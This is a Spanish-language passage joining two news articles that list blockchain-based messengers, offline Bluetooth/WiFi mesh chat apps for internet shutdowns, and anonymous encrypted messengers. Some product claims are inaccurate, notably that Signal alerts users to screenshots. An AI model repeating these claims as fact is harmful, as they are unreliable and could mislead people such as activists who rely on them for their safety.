Esta es una app basada en el blockchain de Ethereum y, del mismo modo que Status, cuenta con funciones de app de mensajería y plataforma de pagos con criptomoneda. Además, es posible hacer video llamadas y enviar mensajes de texto completamente anónimos desde e-Chat. No obstante, lo que hace a esta plataforma única es la capacidad para crear blogs donde los usuarios podrán publicar contenido y monetizarlo.  

BEECHAT

Desarrollada en Corea del Sur, BeeChat es un servicio de mensajería 100% basado en blockchain que permite enviar texto, audio y video, además incluye la función de cartera de criptomoneda con soporte para 12 activos digitales diferentes. Además, BeeChat es compatible con otras cadenas, por lo que sus usuarios podrían usar EOS o Ethereum para almacenar su información de forma completamente protegida con cifrado.

Fuente:https://noticiasseguridad.com/seguridad-movil/5-apps-de-mensajeria-basadas-en-blockchain-para-un-completo-anonimato-en-ios-y-android/

APP para conectarte sin internet y con seguridad

app para conectarte sin internet

Recientemente gobiernos en diversas partes del mundo, como China o India, ha recurrido a la interrupción masiva de algunos sistemas de telecomunicaciones, principalmente telefonía móvil e Internet, para reducir el nivel de organización de las protestas sociales, detener el flujo de información falsa, entre otros motivos, aseguran especialistas en hacking ético. Al tratarse de cortes masivos, estas medidas también afectan a ciudadanos no afines a los movimientos sociales, además de a los pequeños y medianos negocios.

Por fortuna existen diversas alternativas para usar en caso de una interrupción masiva en las redes móviles, por lo que basta conocer algunas de estas opciones para que nadie permanezca incomunicado cuando los gobiernos, ya sea por razones de seguridad o con fines represivos, decidan cortar los servicios de comunicación. A continuación se presentan algunas apps de mensajería que no requieren Internet.

BRIDGEFY

Bridgefy es una app de mensajería que te permite chatear aún sin conexión a Internet. Usando el Bluetooth del smartphone, los usuarios de esta app pueden enviar mensajes a otras personas en un radio de hasta 100 metros. Además, el modo transmisión de Bridgefy le permitirá enviar mensajes a todos los usuarios de la app a su alrededor al mismo tiempo, sin importar si un usuario no está en la lista de contactos del transmisor.

FIRECHAT

Desarrollada por Open Garden, esta es una app que conecta dispositivos a través de Bluetooth, WiFi, entre otros protocolos mediante conexiones de igual a igual. FireChat es ideal para su uso en espacios concurridos, como transporte público, manifestaciones y campus universitarios.

BRIAR

Disponible sólo para usuarios de Android, esta es la herramienta ideal para activistas y periodistas. Si los usuarios de esta app cuentan con conexión a Internet, es posible sincronizarse usando la red Tor; por otra parte, en caso de interrupción masiva de servicios de Internet, Briar conecta a los usuarios vía WiFi o Bluetooth. Especialistas en hacking ético aseguran que Briar mantiene un flujo constante de información en casos de emergencia, por lo que su uso es ampliamente recomendable.

NEAR PEER

Es una app de chat sin conexión disponible sólo para Android. Permite a sus usuarios chatear con sus contactos más cercanos, e incluso con otros usuarios. Aunque su uso requiere de la activación del WiFi de ambos dispositivos, no depende de la conexión a ninguna red.   

SERVAL MERSH

Es un servicio para enviar mensajes de texto e incluso archivos de diversos tipos sin usar una conexión a Internet. Además es posible utilizarla en total ausencia de antenas de telefonía celular, tarjetas SIM o cualquier punto de acceso a una red. Esta app está solamente disponible en el sitio oficial.

La privacidad del usuario en estos casos también es vital, por lo que se incluye un listado de las mejores aplicaciones de mensajería completamente anónima. Estos servicios sí requieren de conexión a Internet, mencionan los expertos en hacking ético.

THREEMA

Esta app cuenta con cifrado en todas sus fases para lograr total anonimato, además de que no requiere ingresar una dirección email para acceder.  Esta app también incluye una función para sincronizar los mensajes de varios dispositivos a la vez, incluyendo la versión del navegador.

WICKR ME

Esta aplicación ofrece cifrado para mensajes de texto, voz y video. Cuenta con la función de tiempo de expiración, que permite la autodestrucción de mensajes después de un tiempo determinado. No requiere de un número de teléfono o dirección de correo para registrarse, por lo que es una buena opción en cuanto al anonimato del usuario. 

SIGNAL

Es considerada una de las plataformas de mensajería y llamadas más seguras. La singularidad de esta aplicación de código abierto es que el contenido no se almacena en el servidor de la compañía, por lo que no se pueden interceptar, además la información también se autodestruye después de un tiempo, incluso alerta al usuario cuando alguien toma una captura de pantalla en la app.

Podríamos estar en la antesala de una época compleja para los activistas políticos, periodistas y su relación con el ejercicio del poder por parte de algunos gobiernos autoritarios, por lo que, acorde a especialistas en hacking ético del Instituto Internacional de Seguridad Cibernética (IICS), es importante contar con alternativas al uso de los servicios de comunicación más populares para contar con planes de respaldo en caso de emergencia.

Fuente:https://noticiasseguridad.com/seguridad-movil/comunicate-sin-necesidad-de-conexion-a-internet-con-estas-aplicaciones/